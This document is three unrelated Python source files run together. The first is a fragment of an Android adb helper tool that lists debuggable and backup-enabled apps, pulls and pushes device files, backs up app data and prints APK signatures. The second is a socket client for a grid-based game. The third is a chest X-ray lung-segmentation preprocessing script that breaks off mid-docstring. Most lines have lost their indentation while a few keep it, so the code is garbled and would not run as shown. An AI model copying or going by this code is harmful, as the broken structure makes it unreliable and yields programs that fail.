return_code, result, _ = execute_adb_shell_command2(pm_cmd)
if return_code != 0 or result is None:
print_error_and_exit('Empty output, something is wrong')
packages = []
for line in result.split('\n'):
_, package_name = line.split(':', 2)
packages.append(package_name)
return packages
def list_all_apps():
cmd = 'pm list packages'
packages = _get_all_packages(cmd)
print('\n'.join(packages))
def list_system_apps():
cmd = 'pm list packages -s'
packages = _get_all_packages(cmd)
print('\n'.join(packages))
def list_non_system_apps():
cmd = 'pm list packages -3'
packages = _get_all_packages(cmd)
print('\n'.join(packages))
def list_debug_apps():
cmd = 'pm list packages'
packages = _get_all_packages(cmd)
if _ASYNCIO_AVAILABLE:
method_to_call = _is_debug_package
params_list = packages
result_list = asyncio_helper.execute_in_parallel(method_to_call, params_list)
debug_packages = []
for (package_name, debuggable) in result_list:
if debuggable:
debug_packages.append(package_name)
print('\n'.join(debug_packages))
else:
print_message('Use python3 for faster execution of this call')
_list_debug_apps_no_async(packages)
def _list_debug_apps_no_async(packages):
debug_packages = []
count = 0
num_packages = len(packages)
for package in packages:
count += 1
print_verbose("Checking package: %d/%s" % (count, num_packages))
# No faster way to do this except to check each and every package individually
if _is_debug_package(package)[1]:
debug_packages.append(package)
print('\n'.join(debug_packages))
_REGEX_DEBUGGABLE = '(pkgFlags|flags).*DEBUGGABLE'
def _is_debug_package(app_name):
pm_cmd = 'dumpsys package %s' % app_name
grep_cmd = '(grep -c -E \'%s\' || true)' % _REGEX_DEBUGGABLE
app_info_dump = execute_adb_shell_command(pm_cmd, piped_into_cmd=grep_cmd)
if app_info_dump is None or not app_info_dump.strip().isnumeric():
print_error_and_exit('Unexpected output for %s | %s = %s' % (pm_cmd, grep_cmd, app_info_dump))
return None, False
return app_name, int(app_info_dump.strip()) > 0
def list_allow_backup_apps():
cmd = 'pm list packages'
packages = _get_all_packages(cmd)
if _ASYNCIO_AVAILABLE:
method_to_call = _is_allow_backup_package
params_list = packages
result_list = asyncio_helper.execute_in_parallel(method_to_call, params_list)
debug_packages = []
for (package_name, debuggable) in result_list:
if debuggable:
debug_packages.append(package_name)
print('\n'.join(debug_packages))
else:
print_message('Use python3 for faster execution of this call')
_list_allow_backup_apps_no_async(packages)
def _list_allow_backup_apps_no_async(packages):
debug_packages = []
count = 0
num_packages = len(packages)
for package in packages:
count += 1
print_verbose("Checking package: %d/%s" % (count, num_packages))
# No faster way to do this except to check each and every package individually
if _is_allow_backup_package(package)[1]:
debug_packages.append(package)
print('\n'.join(debug_packages))
_REGEX_BACKUP_ALLOWED = '(pkgFlags|flags).*ALLOW_BACKUP'
def _is_allow_backup_package(app_name):
pm_cmd = 'dumpsys package %s' % app_name
grep_cmd = '(grep -c -E \'%s\' || true)' % _REGEX_BACKUP_ALLOWED
app_info_dump = execute_adb_shell_command(pm_cmd, piped_into_cmd=grep_cmd)
if app_info_dump is None or not app_info_dump.strip().isnumeric():
print_error_and_exit('Unexpected output for %s | %s = %s' % (pm_cmd, grep_cmd, app_info_dump))
return None, False
return app_name, int(app_info_dump.strip()) > 0
# Source: https://developer.android.com/reference/android/app/usage/UsageStatsManager#STANDBY_BUCKET_ACTIVE
_APP_STANDBY_BUCKETS = {
10: 'active',
20: 'working',
30: 'frequent',
40: 'rare',
}
# Source: https://developer.android.com/preview/features/power#buckets
@ensure_package_exists
def get_standby_bucket(package_name):
_error_if_min_version_less_than(28)
cmd = 'am get-standby-bucket %s' % package_name
result = execute_adb_shell_command(cmd)
if result is None:
print_error_and_exit(_USER_PRINT_VALUE_UNKNOWN)
print_verbose('App standby bucket for \"%s\" is %s' %(
package_name, _APP_STANDBY_BUCKETS.get(int(result), _USER_PRINT_VALUE_UNKNOWN)))
print(_APP_STANDBY_BUCKETS.get(int(result), _USER_PRINT_VALUE_UNKNOWN))
@ensure_package_exists2
def set_standby_bucket(package_name, mode):
_error_if_min_version_less_than(28)
cmd = 'am set-standby-bucket %s %s' % (package_name, mode)
result = execute_adb_shell_command(cmd)
if result is not None: # Expected
print_error_and_exit(result)
def calculate_standby_mode(args):
if args['active']:
return 'active'
elif args['working_set']:
return 'working_set'
elif args['frequent']:
return 'frequent'
elif args['rare']:
return 'rare'
else:
raise ValueError('Illegal argument: %s' % args)
# Source: https://developer.android.com/preview/features/power
@ensure_package_exists2
def apply_or_remove_background_restriction(package_name, set_restriction):
_error_if_min_version_less_than(28)
appops_cmd = 'cmd appops set %s RUN_ANY_IN_BACKGROUND %s' % (
package_name, 'ignore' if set_restriction else 'allow')
execute_adb_shell_command(appops_cmd)
def list_directory(file_path, long_format, recursive, include_hidden_files):
cmd_prefix = 'ls'
if long_format:
cmd_prefix += ' -l'
if recursive:
cmd_prefix += ' -R'
if include_hidden_files:
cmd_prefix += ' -a'
cmd = '%s %s' % (cmd_prefix, file_path)
print_message(execute_file_related_adb_shell_command(cmd, file_path))
def delete_file(file_path, force, recursive):
cmd_prefix = 'rm'
if force:
cmd_prefix += ' -f'
if recursive:
cmd_prefix += ' -r'
cmd = '%s %s' % (cmd_prefix, file_path)
print_message(execute_file_related_adb_shell_command(cmd, file_path))
# Limitation: This command will only do run-as for the src file so, if a file is being copied from pkg1 to pkg2
# on a non-rooted device with both pkg1 and pkg2 being debuggable, this will fail. This can be improved by
# first copying the file to /data/local/tmp but as of now, I don't think that's required.
def move_file(src_path, dest_path, force):
cmd_prefix = 'mv'
if force:
        cmd_prefix += ' -f'
cmd = '%s %s %s' % (cmd_prefix, src_path, dest_path)
if get_package(src_path) and get_package(dest_path) and get_package(src_path) != get_package(dest_path):
print_error_and_exit('Cannot copy a file from one package into another, copy it via /data/local/tmp instead')
return
file_path = None
if get_package(src_path):
file_path = src_path
elif get_package(dest_path):
file_path = dest_path
move_stdout = execute_file_related_adb_shell_command(cmd, file_path)
if move_stdout:
print_message(move_stdout)
print_verbose('Moved "%s" to "%s"' % (src_path, dest_path))
# Copies from remote_file_path on Android to local_file_path on the disk
# local_file_path can be None
def pull_file(remote_file_path, local_file_path, copy_ancillary=False):
if not _file_exists(remote_file_path):
print_error_and_exit('File %s does not exist' % remote_file_path)
if local_file_path is None:
local_file_path = remote_file_path.split('/')[-1]
print_verbose('Local file path not provided, using \"%s\" for that' % local_file_path)
remote_file_path_package = get_package(remote_file_path)
if remote_file_path_package is None and not root_required_to_access_file(remote_file_path):
print_verbose('File %s is not inside a package, no temporary file required' % remote_file_path_package)
pull_cmd = 'pull %s %s' % (remote_file_path, local_file_path)
execute_adb_command2(pull_cmd)
else:
# First copy the files to sdcard, then pull them out, and then delete them from sdcard.
tmp_file = _create_tmp_file()
cp_cmd = 'cp -r %s %s' % (remote_file_path, tmp_file)
execute_file_related_adb_shell_command(cp_cmd, remote_file_path)
pull_cmd = 'pull %s %s' % (tmp_file, local_file_path)
execute_adb_command2(pull_cmd)
del_cmd = 'rm -r %s' % tmp_file
execute_adb_shell_command(del_cmd)
if os.path.exists(local_file_path):
print_message('Copied remote file \"%s\" to local file \"%s\" (Size: %d bytes)' % (
remote_file_path,
local_file_path,
os.path.getsize(local_file_path)))
else:
print_error_and_exit('Failed to copy remote file \"%s\" to local file \"%s\"' % (
remote_file_path,
local_file_path))
if _is_sqlite_database(remote_file_path):
# Copy temporary Sqlite files
# Source :https://ashishb.net/all/android-the-right-way-to-pull-sqlite-database-from-the-device/
for suffix in ['wal', 'journal', 'shm']:
tmp_db_file = '%s-%s' % (remote_file_path, suffix)
if not _file_exists(tmp_db_file):
continue
if copy_ancillary:
pull_file(tmp_db_file, '%s-%s' %(local_file_path, suffix), copy_ancillary=True)
else:
print_error('File \"%s\" has an ancillary file \"%s\" which should be copied.\nSee %s for details'
% (remote_file_path, tmp_db_file,
'https://ashishb.net/all/android-the-right-way-to-pull-sqlite-database-from-the-device/'))
# Limitation: It seems that pushing to a directory on some versions of Android fails silently.
# It is safer to push to a full path containing the filename.
def push_file(local_file_path, remote_file_path):
if not os.path.exists(local_file_path):
print_error_and_exit('Local file %s does not exist' % local_file_path)
if os.path.isdir(local_file_path):
        print_error_and_exit('This tool does not support pushing a directory yet: %s' % local_file_path)
# First push to tmp file in /data/local/tmp and then move that
tmp_file = _create_tmp_file()
push_cmd = 'push %s %s' % (local_file_path, tmp_file)
# "mv" from /data/local/tmp with run-as <app_id> does not always work even when the underlying
# dir has mode set to 777. Therefore, do a two-step cp and rm.
cp_cmd = 'cp %s %s' % (tmp_file, remote_file_path)
rm_cmd = 'rm %s' % tmp_file
return_code, _, stderr = execute_adb_command2(push_cmd)
if return_code != 0:
print_error_and_exit('Failed to push file, error: %s' % stderr)
return
execute_file_related_adb_shell_command(cp_cmd, remote_file_path)
execute_adb_shell_command(rm_cmd)
def cat_file(file_path):
    cmd_prefix = 'cat'
    cmd = '%s %s' % (cmd_prefix, file_path)
    cat_stdout = execute_file_related_adb_shell_command(cmd, file_path)
    # Don't print "None" for an empty file, and don't run the command twice
    if cat_stdout:
        print_message(cat_stdout)
# Source: https://stackoverflow.com/a/25398877
@ensure_package_exists
def launch_app(app_name):
adb_shell_cmd = 'monkey -p %s -c android.intent.category.LAUNCHER 1' % app_name
execute_adb_shell_command(adb_shell_cmd)
@ensure_package_exists
def stop_app(app_name):
    # Below API 21, a plain stop does not kill an app that is in the foreground.
    # On API 21 and above, it seems it does.
if get_device_android_api_version() < 21:
force_stop(app_name)
else:
adb_shell_cmd = 'am kill %s' % app_name
execute_adb_shell_command(adb_shell_cmd)
def _regex_extract(regex, data):
regex_object = re.search(regex, data, re.IGNORECASE)
if regex_object is None:
return None
else:
return regex_object.group(1)
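# Example (illustrative dump fragment): _regex_extract('versionCode=(\\d+)?',
# 'versionCode=42 minSdk=21') returns '42'; when the pattern is absent it
# returns None.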
# adb shell pm dump <app_name> produces about 1200 lines, mostly useless,
# compared to this.
@ensure_package_exists
def print_app_info(app_name):
app_info_dump = execute_adb_shell_command('dumpsys package %s' % app_name)
version_code = _regex_extract('versionCode=(\\d+)?', app_info_dump)
version_name = _regex_extract('versionName=([\\d.]+)?', app_info_dump)
min_sdk_version = _regex_extract('minSdk=(\\d+)?', app_info_dump)
target_sdk_version = _regex_extract('targetSdk=(\\d+)?', app_info_dump)
max_sdk_version = _regex_extract('maxSdk=(\\d+)?', app_info_dump)
installer_package_name = _regex_extract('installerPackageName=(\\S+)?', app_info_dump)
is_debuggable = re.search(
_REGEX_DEBUGGABLE,
app_info_dump,
re.IGNORECASE) is not None
msg = ''
msg += 'App name: %s\n' % app_name
msg += 'Version: %s\n' % version_name
msg += 'Version Code: %s\n' % version_code
msg += 'Is debuggable: %r\n' % is_debuggable
msg += 'Min SDK version: %s\n' % min_sdk_version
msg += 'Target SDK version: %s\n' % target_sdk_version
if max_sdk_version is not None:
msg += 'Max SDK version: %s\n' % max_sdk_version
if get_device_android_api_version() >= 23:
msg += _get_permissions_info_above_api_23(app_info_dump)
else:
msg += _get_permissions_info_below_api_23(app_info_dump)
msg += 'Installer package name: %s\n' % installer_package_name
print_message(msg)
# APIs below 23 have no runtime permissions
def _get_permissions_info_below_api_23(app_info_dump):
install_time_permissions_regex = re.search('grantedPermissions:(.*)', app_info_dump,
re.IGNORECASE | re.DOTALL)
if install_time_permissions_regex is None:
install_time_permissions_string = []
else:
install_time_permissions_string = install_time_permissions_regex.group(1).split('\n')
install_time_granted_permissions = []
install_time_permissions_string = filter(None, install_time_permissions_string)
for permission_string in install_time_permissions_string:
install_time_granted_permissions.append(permission_string)
permissions_info_msg = ''
if len(install_time_granted_permissions) > 0:
permissions_info_msg += 'Install time granted permissions:\n%s\n\n' % '\n'.join(
install_time_granted_permissions)
return permissions_info_msg
# API 23 and above have runtime permissions
def _get_permissions_info_above_api_23(app_info_dump):
requested_permissions_regex = \
re.search('requested permissions:(.*?)install permissions:', app_info_dump, re.IGNORECASE | re.DOTALL)
if requested_permissions_regex is None:
requested_permissions_regex = re.search('requested permissions:(.*?)runtime permissions:', app_info_dump,
re.IGNORECASE | re.DOTALL)
if requested_permissions_regex is None:
requested_permissions = [] # No permissions requested by the app.
else:
requested_permissions = requested_permissions_regex.group(1).split('\n')
install_time_permissions_regex = re.search('install permissions:(.*?)runtime permissions:', app_info_dump,
re.IGNORECASE | re.DOTALL)
if install_time_permissions_regex is None:
install_time_permissions_string = []
else:
install_time_permissions_string = install_time_permissions_regex.group(1).split('\n')
# Remove empty entries
requested_permissions = list(filter(None, requested_permissions))
install_time_permissions_string = filter(None, install_time_permissions_string)
install_time_granted_permissions = []
install_time_denied_permissions = [] # This will most likely remain empty
for permission_string in install_time_permissions_string:
if permission_string.find('granted=true') >= 0:
permission, _ = permission_string.split(':')
install_time_granted_permissions.append(permission)
elif permission_string.find('granted=false') >= 0:
permission, _ = permission_string.split(':')
install_time_denied_permissions.append(permission)
runtime_denied_permissions = []
runtime_granted_permissions = []
for permission in requested_permissions:
if permission in install_time_granted_permissions or permission in install_time_denied_permissions:
continue
granted_pattern = '%s: granted=true' % permission
denied_pattern = '%s: granted=false' % permission
if app_info_dump.find(granted_pattern) >= 0:
runtime_granted_permissions.append(permission)
elif app_info_dump.find(denied_pattern) >= 0:
runtime_denied_permissions.append(permission)
runtime_not_granted_permissions = list(filter(
lambda p: p not in runtime_granted_permissions and
p not in runtime_denied_permissions and
p not in install_time_granted_permissions and
p not in install_time_denied_permissions, requested_permissions))
permissions_info_msg = ''
permissions_info_msg += '\nPermissions:\n\n'
if len(install_time_granted_permissions) > 0:
permissions_info_msg += 'Install time granted permissions:\n%s\n\n' % '\n'.join(
install_time_granted_permissions)
if len(install_time_denied_permissions) > 0:
permissions_info_msg += 'Install time denied permissions:\n%s\n\n' % '\n'.join(
install_time_denied_permissions)
if len(runtime_granted_permissions) > 0:
permissions_info_msg += 'Runtime granted permissions:\n%s\n\n' % '\n'.join(
runtime_granted_permissions)
if len(runtime_denied_permissions) > 0:
permissions_info_msg += 'Runtime denied permissions:\n%s\n\n' % '\n'.join(
runtime_denied_permissions)
if len(runtime_not_granted_permissions) > 0:
permissions_info_msg += 'Runtime Permissions not granted and not yet requested:\n%s\n\n' % '\n'.join(
runtime_not_granted_permissions)
return permissions_info_msg
def _get_apk_path(app_name):
adb_shell_cmd = 'pm path %s' % app_name
result = execute_adb_shell_command(adb_shell_cmd)
apk_path = result.split(':', 2)[1]
return apk_path
@ensure_package_exists
def print_app_path(app_name):
apk_path = _get_apk_path(app_name)
print_verbose('Path for %s is %s' % (app_name, apk_path))
print_message(apk_path)
@ensure_package_exists
def print_app_signature(app_name):
apk_path = _get_apk_path(app_name)
# Copy apk to a temp file on the disk
tmp_apk_file = tempfile.NamedTemporaryFile(prefix=app_name, suffix='.apk')
with tmp_apk_file:
tmp_apk_file_name = tmp_apk_file.name
adb_cmd = 'pull %s %s' % (apk_path, tmp_apk_file_name)
return_code, _, stderr = execute_adb_command2(adb_cmd)
if return_code != 0:
print_error_and_exit('Failed to pull file %s, stderr: %s' % (apk_path, stderr))
return
dir_of_this_script = os.path.split(__file__)[0]
apk_signer_jar_path = os.path.join(dir_of_this_script, 'apksigner.jar')
if not os.path.exists(apk_signer_jar_path):
print_error_and_exit('apksigner.jar is missing, your adb-enhanced installation is corrupted')
print_signature_cmd = 'java -jar %s verify --print-certs %s' % (apk_signer_jar_path, tmp_apk_file_name)
print_verbose('Executing command %s' % print_signature_cmd)
ps1 = subprocess.Popen(print_signature_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
for line in ps1.stdout:
line = line.decode('utf-8').strip()
print_message(line)
for line in ps1.stderr:
line = line.decode('utf-8').strip()
print_error(line)
# Uses abe.jar taken from https://sourceforge.net/projects/adbextractor/
@ensure_package_exists2
def perform_app_backup(app_name, backup_tar_file):
# TODO: Add a check to ensure that the screen is unlocked
password = '00'
print_verbose('Performing backup to backup.ab file')
print_message('you might have to confirm the backup manually on your device\'s screen, enter \"%s\" as password...' % password)
def backup_func():
# Create backup.ab
adb_backup_cmd = 'backup -noapk %s' % app_name
execute_adb_command2(adb_backup_cmd)
backup_thread = threading.Thread(target=backup_func)
backup_thread.start()
while _get_top_activity_data()[1].find('com.android.backupconfirm') == -1:
print_verbose('Waiting for the backup activity to start')
time.sleep(1)
time.sleep(1)
# Commented out since this does not always work and can sometimes lead to random clicks on some devices
# making backups impossible.
# # Tap the backup button
# # Get the location of "backup data" button and tap it.
# window_size_x, window_size_y = _get_window_size()
# # These numbers are purely derived from heuristics and can be improved.
# _perform_tap(window_size_x - 200, window_size_y - 100)
backup_thread.join(timeout=10)
if backup_thread.is_alive():
print_error('Backup failed in first attempt, trying again...')
# _perform_tap(window_size_x - 200, window_size_y - 100)
backup_thread.join(timeout=10)
if backup_thread.is_alive():
print_error_and_exit('Backup failed')
# Convert ".ab" to ".tar" using Android Backup Extractor (ABE)
try:
dir_of_this_script = os.path.split(__file__)[0]
abe_jar_path = os.path.join(dir_of_this_script, 'abe.jar')
if not os.path.exists(abe_jar_path):
print_error_and_exit('Abe.jar is missing, your adb-enhanced installation is corrupted')
abe_cmd = 'java -jar %s unpack backup.ab %s %s' % (abe_jar_path, backup_tar_file, password)
print_verbose('Executing command %s' % abe_cmd)
ps = subprocess.Popen(abe_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
ps.communicate()
if ps.returncode == 0:
print_message('Successfully backed up data of app %s to %s' % (app_name, backup_tar_file))
else:
print_error('Failed to convert backup.ab to tar file. Please ensure that it is not password protected')
finally:
print_verbose('Deleting backup.ab')
ps = subprocess.Popen('rm backup.ab', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
ps.communicate()
def perform_install(file_path):
print_verbose('Installing %s' % file_path)
# -r: replace existing application
return_code, _, stderr = execute_adb_command2('install -r %s' % file_path)
if return_code != 0:
print_error('Failed to install %s, stderr: %s' % (file_path, stderr))
@ensure_package_exists
def perform_uninstall(app_name):
print_verbose('Uninstalling %s' % app_name)
return_code, _, stderr = execute_adb_command2('uninstall %s' % app_name)
if return_code != 0:
print_error('Failed to uninstall %s, stderr: %s' % (app_name, stderr))
def _get_window_size():
adb_cmd = 'shell wm size'
_, result, _ = execute_adb_command2(adb_cmd)
if result is None:
return -1, -1
regex_data = re.search('size: ([0-9]+)x([0-9]+)', result)
if regex_data is None:
return -1, -1
return int(regex_data.group(1)), int(regex_data.group(2))
def _perform_tap(x, y):
adb_shell_cmd = 'input tap %d %d' % (x, y)
execute_adb_shell_command2(adb_shell_cmd)
# Deprecated
def execute_adb_shell_settings_command(settings_cmd, device_serial=None):
_error_if_min_version_less_than(19, device_serial=device_serial)
return execute_adb_shell_command('settings %s' % settings_cmd, device_serial=device_serial)
def execute_adb_shell_settings_command2(settings_cmd, device_serial=None):
_error_if_min_version_less_than(19)
return execute_adb_shell_command2('settings %s' % settings_cmd, device_serial)
def execute_adb_shell_settings_command_and_poke_activity_service(settings_cmd):
return_value = execute_adb_shell_settings_command(settings_cmd)
_poke_activity_service()
return return_value
def execute_adb_shell_command_and_poke_activity_service(adb_cmd):
return_value = execute_adb_shell_command(adb_cmd)
_poke_activity_service()
return return_value
def _poke_activity_service():
return execute_adb_shell_command(get_update_activity_service_cmd())
def _error_if_min_version_less_than(min_acceptable_version, device_serial=None):
api_version = get_device_android_api_version(device_serial)
if api_version < min_acceptable_version:
cmd = ' '.join(sys.argv[1:])
print_error_and_exit(
'\"%s\" can only be executed on API %d and above, your device version is %d' %
(cmd, min_acceptable_version, api_version))
def _is_emulator():
qemu = get_adb_shell_property('ro.kernel.qemu')
return qemu is not None and qemu.strip() == '1'
|
client.py
|
import socket
from multiprocessing import Queue
from threading import Thread
from classes.inventory import Inventory, _ITEMS
from classes.player import Player
from common.listtools import find
from common.vec import Vec2d
_max_buffer_size = 4096
def parse_response_array(s: str) -> list:
    translator = str.maketrans('', '', '[]\n')
    data = s.translate(translator).strip().split(',')
    return data
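# Example: parse_response_array('[food 2, linemate 1]\n') removes the brackets
# and newline and returns ['food 2', ' linemate 1']; note the leading space left
# by the comma split, which is why callers strip() each element.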
def clamp(value, max_val):
assert isinstance(value, type(max_val))
return (value + max_val) % max_val
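# clamp wraps a coordinate onto the toroidal map, e.g. clamp(5, 4) == 1 and
# clamp(-1, 4) == 3, so walking off one edge re-enters from the opposite edge.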
class Client:
player: Player = None
sock = socket.socket()
port = -1
team = ''
mapSize = Vec2d(0, 0)
host: str
slotsLeft: int
responses = Queue()
messages = Queue()
def __init__(self, port: int, name: str, host: str):
self.r_th = Thread(target=self.read, args=(self.sock, self.responses, self.messages))
self.host = host
self.port = port
self.team = name
self.player = Player(pid=0, pos=Vec2d(0, 0))
def connect(self):
self.sock.connect((self.host, self.port))
self.r_th.daemon = True
self.r_th.start()
@staticmethod
    def read(sock: socket.socket, responses: Queue, messages: Queue):
buf = ''
while True:
buf += sock.recv(_max_buffer_size).decode()
if len(buf) == 0:
return
            while buf.find('\n') != -1:
res, buf = buf.split('\n', maxsplit=1)
if res.split(maxsplit=1)[0] == 'message':
# print(f'received msg [{res}]')
messages.put(res)
else:
# print(f'received response [{res}]')
responses.put(res)
def write(self, data):
# print(f' sending [{data}]')
if not data.endswith('\n'):
data += '\n'
self.sock.send(data.encode())
def terminate(self):
self.sock.close()
def get_initial_data(self):
self.slotsLeft = int(self.responses.get())
x, y = self.responses.get().split(' ')
self.mapSize = Vec2d(int(x), int(y))
def move_forward(self):
# print(f'Forward in {self.player.orientation} direction')
self.write('Forward')
if self.responses.get() != 'ok':
exit(0)
if self.player.orientation == 0: # NORTH
# print('NORTH')
self.player.position.set_y(clamp(self.player.position.y() + 1, self.mapSize.y()))
elif self.player.orientation == 2: # SOUTH
# print('SOUTH')
self.player.position.set_y(clamp(self.player.position.y() - 1, self.mapSize.y()))
elif self.player.orientation == 1: # EAST
# print('EAST')
self.player.position.set_x(clamp(self.player.position.x() + 1, self.mapSize.x()))
elif self.player.orientation == 3: # WEST
# print('WEST')
self.player.position.set_x(clamp(self.player.position.x() - 1, self.mapSize.x()))
def turn_right(self):
# print('Right')
self.write('Right')
if self.responses.get() != 'ok':
exit(0)
self.player.orientation = (self.player.orientation + 1 + 4) % 4
def turn_left(self):
# print('Left')
self.write('Left')
if self.responses.get() != 'ok':
exit(0)
self.player.orientation = (self.player.orientation - 1 + 4) % 4
def look(self):
self.write('Look')
data = parse_response_array(self.responses.get())
self.player.vision = []
for s in data:
vision = Inventory([0]*len(_ITEMS))
segment = s.strip().split(' ')
for key in segment:
if find(vision.keys(), key=lambda x: x == key) is not None:
vision[key] += 1
self.player.vision.append(vision)
def get_inventory(self):
self.write('Inventory')
data = parse_response_array(self.responses.get())
for s in data:
item, val = s.strip().split(' ')
self.player.inventory[item] = int(val)
def send_information(self):
text = f'{self.team};{self.player.to_str()}'
self.broadcast(text)
def broadcast(self, text: str):
self.write('Broadcast ' + text)
if self.responses.get() != 'ok':
exit(0)
def get_remaining_slots(self):
self.write('Connect_nbr')
self.slotsLeft = int(self.responses.get())
def fork(self):
if self.slotsLeft > 0:
self.write('Fork')
if self.responses.get() != 'ok':
exit(0)
def eject(self):
self.write('Eject')
if self.responses.get() != 'ok':
exit(0)
def take(self, item: str) -> bool:
self.write('Take ' + item)
res = self.responses.get()
if res == 'dead':
exit(0)
if res == 'ok':
self.player.inventory[item] += 1
return True
return False
def set(self, item: str):
if self.player.inventory[item] <= 0:
return
self.write('Set ' + item)
if self.responses.get().strip() == 'ok':
self.player.inventory[item] -= 1
self.player.vision[0][item] += 1
else:
exit(0)
def incantation(self):
self.write('Incantation')
response = self.responses.get()
if response != 'ok':
exit(0)
self.player.timeout = 300
|
crop_img.py
|
import numpy as np
from skimage import io, color, exposure, img_as_float, transform, util
from matplotlib import pyplot as plt
import pathlib
import cv2
import multiprocessing
import time
import argparse
from keras.models import load_model
from keras.preprocessing.image import ImageDataGenerator
import os
"""
This script will preprocess a given image dataset. For each chest x-ray image,
the chest region will be detected and segmented with pretrained U-Net. The lung
region will be 256x256 in size. The result will be saved in a new directory.
"""
def load_CXR_from_list(filelist, im_shape):
"""
    This function reads in images of jpg, png or jpeg format from a directory,
    normalizes the images and stores them in an array.
    The images should have the same height and width.
Parameters:
filelist (list): A list contains all file names in a directory.
im_shape (int): the size of images in the resulting array(img_shape, img_shape).
Returns:
X (list): a list of resized and normalized images.
resized_raw (list): a list of resized images.
        raw_images (list): a list of the original, unresized images.
"""
X = np.zeros((len(filelist), im_shape[0], im_shape[1], 1))
resized_raw = np.zeros((len(filelist), im_shape[0], im_shape[1]))
raw_images = []
for k, file in enumerate(filelist):
if file.suffix.lower() in ['.jpg', '.png', '.jpeg'] :
print('loading ' + file.name)
img = img_as_float(io.imread(file, as_gray = True))
raw_images.append(img)
img = transform.resize(img, im_shape)
resized_raw[k, ...] = img
img = exposure.equalize_hist(img)
img = np.expand_dims(img, -1)
X[k, ...] = img
# X = np.array(X)
# resized_raw = np.array(resized_raw)
X -= X.mean()
X /= X.std()
print ('### Dataset loaded')
print ('X shape ={} \t raw_resized shape = {}'.format(X.shape, resized_raw.shape))
print ('\tX:{:.1f}-{:.1f}\n'.format(X.min(), X.max()))
print ('\tX.mean = {}, X.std = {}'.format(X.mean(), X.std()))
return X, resized_raw, raw_images
def masked(img, mask, alpha=1):
"""
This function outlines lung field with red and predicted lung field with blue.
Parameters:
img (array): the original x-ray image.
mask (array): a predicted mask for the lung field.
alpha (float): variable used to change the color of the predicted lung field.
Returns:
img_masked (array): the lung field and predicted lung field mask.
"""
rows, cols = img.shape
color_mask = np.zeros((rows, cols, 3))
color_mask[..., 2] = mask / 255
img_color = np.dstack((img, img, img))
img_hsv = color.rgb2hsv(img_color)
color_mask_hsv = color.rgb2hsv(color_mask)
img_hsv[..., 0] = color_mask_hsv[..., 0]
img_hsv[..., 1] = color_mask_hsv[..., 1] * alpha
img_masked = color.hsv2rgb(img_hsv)
return img_masked
def draw_spine(img, spine_pos):
"""
This function highlights the spine position on the original image.
Parameters:
img (array): the original x-ray image.
        spine_pos (int): the x coordinate (column) of the spine.
Returns:
img_color (array): superimpose the spine_pos and the original image.
"""
if len(img.shape) == 2:
img_color = np.dstack((img, img, img))
elif len(img.shape) == 3 and img.shape[2] == 1:
squeezed = np.squeeze(img)
img_color = np.dstack((squeezed, squeezed, squeezed))
elif len(img.shape) == 3 and img.shape[2] == 3:
img_color = np.copy(img)
else:
raise ValueError('Bad dimension of img :' + str(img.shape))
cv2.rectangle(img_color, (spine_pos, 0), (spine_pos, img.shape[0]), color = (0.8, 0 , 0), thickness = int(round(max(img.shape) * 0.02)))
return img_color
def draw_bbox(img, bbox):
"""
This function draws bounding box of lung field.
Parameters:
img (array): the original x-ray image.
bbox (array): the bounding box of lung field in the form of left most coordinate,
top most coordinate, right most coordinate and bottom most coordinate.
Returns:
img_color (array): the superimposed image of the original image and the
bounding box.
"""
if len(img.shape) == 2:
img_color = np.dstack((img, img, img))
elif len(img.shape) == 3 and img.shape[2] == 1:
squeezed = np.squeeze(img)
img_color = np.dstack((squeezed, squeezed, squeezed))
elif len(img.shape) == 3 and img.shape[2] == 3:
img_color = np.copy(img)
else:
raise ValueError('Bad dimension of img :' + str(img.shape))
if not (bbox is None):
left, top, right, bottom = bbox
cv2.rectangle(img_color, (left, top), (right, bottom), color = (0, 0.8, 0), thickness = int(round(max(img.shape) * 0.01)))
return img_color
def join_path_from_list(cur_path, path_list):
"""
This function adds a series of directory to a given path.
Parameters:
cur_path (path object): the path to be extended.
path_list (list): a list of directory to add to cur_path.
Returns:
cur_path (path object): the extended path.
"""
for folder in path_list:
cur_path = cur_path.joinpath(folder)
return cur_path
def change_first_folder(data_path, attached_str):
"""
This function changes the first directory specified in a given path.
Parameters:
        data_path (list): the list of path components to be altered.
        attached_str (string): the suffix appended to the first directory in data_path.
    Returns:
        to_return (list): the altered list of path components.
"""
to_return = data_path.copy()
to_return[0] = to_return[0] + attached_str
return to_return
def select_spine(img):
"""
This function finds the location of spine of an x-ray image.
Parameters:
img (array): the original x-ray image.
Returns:
max_r2 (int): location of the spine.
"""
sumpix0 = np.sum(img, axis = 0)
max_r2 = np.int_(len(sumpix0) / 3) + np.argmax(sumpix0[ np.int_(len(sumpix0) / 3): np.int_(len(sumpix0)* 2 / 3)])
return max_r2
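# Worked example (assuming a 256-pixel-wide image): only the middle third of the
# columns (85..169) is searched, so max_r2 = 85 + argmax(sumpix0[85:170]); the
# brightest column in that band is taken as the spine position.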
def mirror(spine_pos, pos):
"""
    This function mirrors a position to the opposite side of the spine.
Parameters:
spine_pos (int): the position of the spine.
pos (int): the position of the middle of the image.
Returns:
spine_pos + (spine_pos - pos) or spine_pos - (pos - spine_pos) (int): mirror
the spine position to left or right of the center of the image.
"""
if pos < spine_pos:
return spine_pos + (spine_pos - pos)
else:
return spine_pos - (pos - spine_pos)
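# Example: with the spine at column 128, mirror(128, 100) == 156 and
# mirror(128, 150) == 106, i.e. the point is reflected across the spine.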
def left_right(label_map, label, spine_pos):
"""
    This function determines on which side of the spine a labeled segment mainly lies.
Parameters:
label_map (array): the label matrix produced from cv2.connectedComponentsWithStats.
label (int): the label value to be compared with.
spine_pos (int): the location of the spine.
Returns:
        'left'/'right'/'mid': the side of the spine where the labeled segment has the larger area.
"""
left_chunk_size = np.sum(label_map[:, 0 : spine_pos] == label)
right_chunk_size = np.sum(label_map[:, spine_pos + 1 :] == label)
if left_chunk_size > right_chunk_size:
return 'left'
elif left_chunk_size < right_chunk_size:
return 'right'
else:
return 'mid'
def select_lung(pred, resized_raw, cut_thresh, debug, filename,out_pad_size, k_size = 5):
"""
This function detects the lung region and denoise the image.
Parameters:
pred (array): the predicted lung mask produced by the pretrained U-Net.
        resized_raw (array): the original image, resized.
cut_thresh (float): the area threshold to keep a segment as a part of the
lung region.
debug (boolean): print extra information about the connected components
for debugging purpose.
filename (string): the file name of the original image.
